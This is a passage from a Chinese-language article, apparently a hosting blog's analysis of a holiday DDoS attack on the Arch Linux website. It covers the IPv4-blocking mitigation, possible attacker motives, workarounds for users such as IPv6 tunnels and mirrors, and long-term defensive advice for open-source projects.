服务降级以维持核心可用性:此策略的本质是一种“服务降级”。它牺牲了大多数用户的访问便利性(因全球IPv6普及率仍非100%),但确保了网站基础设施本身不因资源耗尽而彻底崩溃,并保留了项目团队与部分用户(拥有IPv6连接)进行状态同步和获取关键信息的通道。这是一种在“完全下线”和“承受攻击”之间的折中选择。 成本与复杂度考量:启用全面的云端DDoS清洗服务通常涉及配置变更、流量重定向和潜在的费用。在假期期间快速协调和部署可能存在障碍。相比之下,在现有设备上通过防火墙策略禁用IPv4访问,是一项几乎立即可执行、零额外成本的紧急制动措施。 攻击动机与影响:为何开源项目成为“软目标”? 开源项目,尤其是像Arch Linux这样高度依赖单一官方网站和仓库的社区驱动项目,在DDoS攻击面前尤为脆弱: 动机推测: 勒索:可能是攻击者试图勒索项目方或其托管提供商。 扰乱:纯粹为了制造混乱,攻击知名目标以彰显“实力”。 竞争或仇恨:针对特定社区或理念的恶意破坏。 测试或掩盖:利用假期响应慢的特点进行攻击技术测试,或为其他黑客活动作掩护。 深远影响: 用户信任受挫:新用户无法获取安装介质,现有用户无法查阅Wiki文档,直接损害了项目的可用性与声誉。 贡献者协作中断:网站是代码托管、问题追踪和社区讨论的核心平台,其瘫痪将直接冻结项目开发进程。 暴露供应链弱点:攻击揭示了现代开源生态中,许多关键基础设施仍然依赖于单一入口点和有限的项目维护资源,缺乏企业级的冗余与抗DDoS能力。 【主机帮】应急指南:Arch用户如何应对及长期防护思考 短期应对:如何访问受限资源? 对于急需访问Arch官网或Wiki的用户,可尝试以下方法: 启用IPv6:检查你的网络环境(家庭路由器、运营商)是否支持并已启用IPv6。这是最直接的访问方式。 使用IPv6代理或隧道服务:通过Cloudflare WARP、Hurricane Electric IPv6 Tunnel Broker等免费服务,为你的设备建立IPv6隧道。 利用镜像站与存档:尝试访问全球各地的Arch Linux镜像站,它们可能托管了关键的ISO安装文件和软件包。同时,Internet Archive(archive.org) 可能缓存了Wiki页面。 关注替代沟通渠道:密切关注Arch Linux的邮件列表、官方论坛或社交媒体账号(如Mastodon、Twitter),以获取最新状态更新。 长期防护启示:开源项目如何加固其数字堡垒? 此次事件为所有关键开源项目敲响了警钟: 拥抱多云与分布式托管:将官网、代码仓库、文档等静态资产部署在具备全球Anycast网络和内置DDoS缓解能力的CDN(如Cloudflare Pages, GitHub Pages)之后。动态服务可考虑跨云提供商进行负载均衡。 制定并演练安全应急预案:明确在遭受DDoS、供应链攻击等事件时的响应流程、沟通渠道和决策权限,避免在危机中慌乱。 设立安全维护基金:社区应考虑公开筹集或寻求赞助,设立专项安全基金,用于购买专业的DDoS缓解服务、安全审计和应急响应支持。 推动IPv6作为默认和优先协议:从基础设施层面将IPv6提升为首要支持协议,并鼓励用户和镜像站启用IPv6。这不仅能分散风险,也是面向未来的技术布局。 结论:一场对“开源精神”基础承载力的压力测试 Arch Linux官网在圣诞假期遭袭,不仅仅是一次技术事件,更是对整个开源协作模式在恶劣网络环境中生存能力的一次压力测试。它无情地揭示:由志愿者爱心维护的、被视为互联网公共品的核心知识库与工具链,其可用性正暴露在日益商品化、低门槛的攻击威胁之下。 防御此类攻击,已远超出单个项目志愿者的能力范围。这需要更广泛的行业协作、更成熟的基础设施即服务(IaaS)支持,以及社区对安全投入的观念转变。只有当开源项目的“数字家园”像其